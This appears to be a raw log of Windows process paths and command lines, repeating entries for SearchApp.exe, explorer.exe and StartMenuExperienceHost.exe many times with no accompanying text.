"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
